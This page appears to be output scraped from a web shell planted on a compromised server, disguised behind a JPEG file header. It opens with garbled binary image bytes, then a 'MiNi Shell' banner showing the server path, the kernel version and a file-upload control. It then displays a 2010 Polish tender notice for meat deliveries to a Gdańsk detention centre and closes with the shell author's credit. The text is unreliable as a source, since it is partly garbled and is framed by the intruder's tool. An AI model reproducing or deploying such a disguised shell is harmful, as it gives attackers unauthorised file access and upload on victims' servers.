JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/18996-N-2010.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 1/DKw/Ż/2010 na dostawy mięsa, podrobów i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 18996 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 1/DKw/Ż/2010 na dostawy mięsa, podrobów i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu są dostawy transportem  wykonawcy  i na koszt wykonawcy mięsa, wędlin i produktów mięsnych w  ilości  średniej: 
I część zamówienia - antrykot bez kości 975kg, karkówka bez kości 120kg, kości schabowe 6300kg, mięso gulaszowe wołowe 8250 kg, mięso mielone wieprzowo - wołowe 5250kg, mięso wieprzowe rozdrobnione 1200kg, ogony wieprzowe 225kg, schab z  kością 120kg, szponder 3000kg, wątroba wołowa mrożona 3300kg, łój wołowy mrożony 120kg, blok kanapkowy 2550kg, blok szynkowy 300kg, boczek faszerowany 1275kg, kaszanka 3000kg, kiełbasa biała parzona 120kg, kiełbasa czosnkowa 3000kg, kiełbasa dębicka 300kg, kiełbasa golonkowa prasowana 300kg, kiełbasa luncheon-meat  2550kg, kiełbasa metka 2550kg, kiełbasa mielonka prasowana 2550kg, kiełbasa mortadela 2550kg, kiełbasa mortadela z papryką 2550kg, kiełbasa parówkowa 1500kg, kiełbasa pieprzowa 2550kg, kiełbasa piwna 45kg, kiełbasa szynkowa 450 kg, kiełbasa śląska 750kg, kiełbasa zielonogórska 300kg, kiełbasa zwyczajna 5250kg, kiełbasa żywiecka 45kg, parówka cielęca 300kg, parówka cienka 3000kg, pasztet pieczony 1275kg, pasztetowa 1275kg, pieczeń chlebowa 1275kg, podgardle wędzone 900kg, polędwica sopocka 75kg, przysmak tyrolski 1275kg, salceson biały 1275kg, salceson czarny 1275kg, szynka gotowana 300kg, szynka mozaikowa 300kg, szynka w galarecie czysta bez dodatków 300kg.
II część zamówienia - pasztet mazowiecki konserwa ( 180-300g./szt.) 1350kg, konserwa mięsna turystyczna  z samootwieraczem (180-300g./szt.) 1350kg.
Dostawy  realizowane będą od daty podpisania umowy przez okres 15 miesięcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zobowiązany jest wnieść wadium. Wysokość wadium wynosi : dla I części zamówienia  4 000 zł, dla II części zamówienia 100 zł. Wadium musi być wniesione przed terminem składania ofert w formach określonych w art. 45 Prawa Zamówień Publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Ocena spełnienia warunków dokonana będzie przez Zamawiającego na podstawie załączonego do oferty oświadczenia o spełnianiu warunków.Dokonując porównania i oceny złożonych ofert, zamawiający kierować się będzie wyłącznie ceną.Dokonując porównania i oceny złożonych ofert, zamawiający kierować się będzie wyłącznie ceną.
	Cena					100 %
	Ofercie z najniższą ceną przyznane zostanie 100 pkt, pozostałym ofertom proporcjonalnie mniej, w zależności od proponowanej ceny ( Pj = Cmin/Cj x 100 pkt), Pj - punktacja oferty j, Cmin - cena najniższej oferty, Cj - cena oferty j..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do przetargu mogą stawać wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2007r. Nr 223 poz. 1655 z póź. zm.) i nie podlegają wykluczeniu z postępowania na podstawie  art. 24 ust. 1 i 2  tej ustawy.Ocena spełnienia warunków dokonana będzie przez Zamawiającego na podstawie załączonego do oferty oświadczenia o spełnianiu warunków..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można otrzymać (bezpłatnie) po złożeniu pisemnego wniosku drogą pisemną, faksem na nr ( 058) 302-51-25 lub drogą elektroniczną e- mail: dkw_gdansk@sw.gov.pl osobiście u Zamawiającego lub pocztą..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 13:30, miejsce: Sekretariat Aresztu Śledczego w Gdańsku ul. Kurkowa 12; 80-803 Gdańsk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, wędliny i produkty mięsne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I część zamówienia - antrykot bez kości 975kg, karkówka bez kości 120kg, kości schabowe 6300kg, mięso gulaszowe wołowe 8250 kg, mięso mielone wieprzowo - wołowe 5250kg, mięso wieprzowe rozdrobnione 1200kg, ogony wieprzowe 225kg, schab z  kością 120kg, szponder 3000kg, wątroba wołowa mrożona 3300kg, łój wołowy mrożony 120kg, blok kanapkowy 2550kg, blok szynkowy 300kg, boczek faszerowany 1275kg, kaszanka 3000kg, kiełbasa biała parzona 120kg, kiełbasa czosnkowa 3000kg, kiełbasa dębicka 300kg, kiełbasa golonkowa prasowana 300kg, kiełbasa luncheon-meat  2550kg, kiełbasa metka 2550kg, kiełbasa mielonka prasowana 2550kg, kiełbasa mortadela 2550kg, kiełbasa mortadela z papryką 2550kg, kiełbasa parówkowa 1500kg, kiełbasa pieprzowa 2550kg, kiełbasa piwna 45kg, kiełbasa szynkowa 450 kg, kiełbasa śląska 750kg, kiełbasa zielonogórska 300kg, kiełbasa zwyczajna 5250kg, kiełbasa żywiecka 45kg, parówka cielęca 300kg, parówka cienka 3000kg, pasztet pieczony 1275kg, pasztetowa 1275kg, pieczeń chlebowa 1275kg, podgardle wędzone 900kg, polędwica sopocka 75kg, przysmak tyrolski 1275kg, salceson biały 1275kg, salceson czarny 1275kg, szynka gotowana 300kg, szynka mozaikowa 300kg, szynka w galarecie czysta bez dodatków 300kg.
Dostawy  realizowane będą od daty podpisania umowy przez okres 15 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 15.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II część zamówienia - pasztet mazowiecki konserwa ( 180-300g./szt.) 1350kg, konserwa mięsna turystyczna  z samootwieraczem (180-300g./szt.) 1350kg.
Dostawy  realizowane będą od daty podpisania umowy przez okres 15 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 15.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com